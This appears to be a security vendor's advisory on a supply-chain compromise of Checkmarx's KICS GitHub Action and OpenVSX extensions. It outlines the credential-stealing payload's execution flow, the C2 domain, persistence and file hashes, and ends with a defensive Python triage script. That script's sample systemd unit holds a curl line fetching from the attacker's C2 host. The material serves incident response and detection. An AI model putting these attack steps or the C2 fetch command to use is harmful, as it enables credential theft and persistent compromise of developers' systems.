KICS GitHub Action Compromised: TeamPCP Strikes Again in Supply Chain Attack

Source: wiz.io (Wiz Blog); submitted to Hacker News by blazarquasar, 7 days ago.
The KICS GitHub Action was compromised with credential-stealing malware by TeamPCP, the same group behind the Trivy attack. KICS is an open source infrastructure as code security scanner by Checkmarx. Between 12:58 and 16:50 UTC on March 23rd, any users of this GitHub Action who were pinning to one of the compromised tags would have been served the malware. The repository was taken down at 16:50 UTC, shortly after a GitHub issue was filed by a user notifying the maintainers of the incident. The action was available at https://github.com/Checkmarx/kics-github-action prior to takedown.

Update 19:24 UTC: The repository has been reinstated, and the maintainers state "The issue is resolved now."

Update 22:25 UTC: Sysdig reports that ast-github-action was also impacted. They were limited to observing a single malicious tag, 2.3.28; however, based on TeamPCP's tactics, we believe it is likely all tags were impacted.

Update 22:35 UTC: Based on a tip from independent researcher Adnan Khan, Wiz has confirmed that the Checkmarx OpenVSX extensions cx-dev-assist 1.7.0 and ast-results 2.53.0 have been compromised. This was concurrently reported by ReversingLabs via tweet. See the "OpenVSX Payload" section below for details. We have reported these to OpenVSX for removal.

This is the second popular open source security scanner that this group has compromised in the last five days. The operation uses familiar naming conventions and the same RSA public key, allowing Wiz to assess with high confidence that it is the same actor.
KICS GitHub Action Payload

The malicious code was injected in the same manner as in the Trivy incident:

- The attacker staged imposter commits (commits on a fork of the repository) containing their payload, setup.sh. [Figure: setup.sh]
- The attacker then used what appears to be a compromised identity to directly update all 35 tags in the project and point them to those staged commits.

The malware also functions similarly, but with a few key differences:

- This version uses a new C2 domain: checkmarx.zone.
- The new version creates a docs-tpcp repository via the victim's GITHUB_TOKEN as a fallback in case of C2 disruption. In the Trivy incident, tpcp-docs was used instead.
- This version adds Kubernetes-focused persistence code, in addition to the existing credential stealing and exfiltration code.

While kics-github-action has ~1% of the visible public usage of trivy-action, it is still broadly adopted publicly and privately as an Infrastructure as Code security scanner. We will update this post with further analysis.

GitHub Compromise

The attack appears to have been accomplished via the compromise of the cx-plugins-releases (GitHub ID 225848595) service account, as that is the identity involved in publishing the malicious tags.

OpenVSX Payload

Both compromised extensions (ast-results v2.53.0 and cx-dev-assist v1.7.0) contained identical payloads. They were published 12 seconds apart at 12:53 UTC on March 23, 2026, via the ast-phoenix account on Open VSX. The VS Code Marketplace versions appear unaffected.

Payload Execution Flow

1. On activation of the extension, the new malicious environmentAuthChecker.js is invoked from activateCore.js.
2. This payload first checks whether the victim has credentials for at least one cloud provider. [Figure: credential gating within the payload]
3. If any credentials are detected, the second-stage payload is retrieved from the C2: checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz. [Figure: retrieval of the second stage from the C2]
4. The payload attempts execution via npx, bunx, pnpx, or yarn dlx. This covers the major JavaScript package managers.

The retrieved package contains a comprehensive credential stealer. Harvested credentials are then encrypted, using the same keys as elsewhere in this campaign, and exfiltrated to checkmarx[.]zone/vsx as tpcp.tar.gz. [Figure: scand() function hunting credentials]

On non-CI systems, the malware installs persistence via a systemd user service. The persistence script polls https://checkmarx[.]zone/raw every 50 minutes for additional payloads, with a kill switch that aborts if the response contains "youtube". Currently, the link redirects to The Show Must Go On by Queen. [Figure: persist() persistence function]

Compromised Artifacts

OpenVSX Extensions (artifact: SHA256)

- ast-results-2.53.0.vsix: 65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d
- cx-dev-assist-1.7.0.vsix: 744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0
- checkmarx-util-1.0.4.tgz: 0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c
- environmentAuthChecker.js: 527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90

kics-github-action Releases

The v1.1 release was the only malicious release created. Other releases, triggered automatically by the tag events, failed because those versions already existed.
kics-github-action Tags

All 35 tags of kics-github-action were repointed to the attacker's staged commits.

Which actions should security teams take?

- Audit KICS GitHub Actions references: Review workflows using kics-github-action. If you referenced a version tag rather than a SHA, check workflow run logs from the exposure window for signs of compromise.
- Search for exfiltration artifacts: Look for repositories named docs-tpcp in your GitHub organization, which may indicate successful exfiltration via the fallback mechanism.
- Long-term hardening: Refer to Wiz's How to Harden GitHub Actions: The Unofficial Guide.

How can Wiz help?

Wiz customers should continue to monitor the advisory in the Wiz Threat Center for ongoing guidance, pre-built queries, and references to relevant detections they can use to assess the risk in their environment. Worried you've been impacted? Connect with the Wiz Incident Response team.
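As an added example (not code from the Wiz post or from Checkmarx), a small Python triage script covering the workflow-audit step above and the systemd persistence described in the OpenVSX payload section: it flags references to the two compromised actions that use a mutable tag or branch instead of a full commit SHA, and it scans the user's systemd unit directory for the checkmarx[.]zone C2 domain. The sample workflow and unit text are constructed inputs, and the scan paths are assumptions.

```python
"""Added triage helpers (not code from the Wiz post or Checkmarx): flag mutable refs
to the compromised actions in workflow YAML and find systemd user units that
reference the checkmarx[.]zone C2 the post describes."""
import re
from pathlib import Path

# Actions named as compromised; GitHub matches owner/repo case-insensitively.
AFFECTED_ACTIONS = ("checkmarx/kics-github-action", "checkmarx/ast-github-action")
C2_DOMAIN = "checkmarx.zone"  # C2 domain from the post, defanging brackets removed
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^@\s'\"]+)@([^\s'\"#]+)", re.M)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")

def audit_workflow(text):
    """Return (action, ref, verdict) for each affected action in one workflow.
    A full commit SHA is immutable; a tag or branch could have been repointed to
    the attacker's staged commits during the exposure window."""
    findings = []
    for action, ref in USES_RE.findall(text):
        if action.lower() in AFFECTED_ACTIONS:
            verdict = "pinned-sha" if SHA_RE.match(ref) else "mutable-ref-exposed"
            findings.append((action, ref, verdict))
    return findings

def c2_hits(text):
    """Lines of a unit file or helper script that mention the C2 domain."""
    return [ln.strip() for ln in text.splitlines() if C2_DOMAIN in ln.lower()]

def scan_tree(root, pattern, check):
    """Run `check` over every file under root matching pattern; keep non-empty results."""
    results = {}
    for p in Path(root).rglob(pattern):
        hits = check(p.read_text(errors="replace"))
        if hits:
            results[str(p)] = hits
    return results

# Constructed samples so the helpers can be exercised without touching disk.
SAMPLE_WORKFLOW = (
    "jobs:\n  scan:\n    steps:\n"
    "      - uses: actions/checkout@v4\n"
    "      - uses: Checkmarx/kics-github-action@v2.1.20\n"
    "      - uses: checkmarx/ast-github-action@" + "a" * 40 + "\n"
)
SAMPLE_UNIT = "[Service]\nExecStart=/usr/bin/curl -fsSL https://checkmarx.zone/raw\n"

if __name__ == "__main__":
    print(audit_workflow(SAMPLE_WORKFLOW), c2_hits(SAMPLE_UNIT))
    # Real hunt (assumed paths): this repository's workflows, then the user's units.
    print(scan_tree(".github/workflows", "*.y*ml", audit_workflow))
    print(scan_tree(Path.home() / ".config/systemd/user", "*.service", c2_hits))
```

A "mutable-ref-exposed" finding means the run logs from the exposure window need review; a hit from c2_hits on a live host warrants a full incident response, not just unit removal.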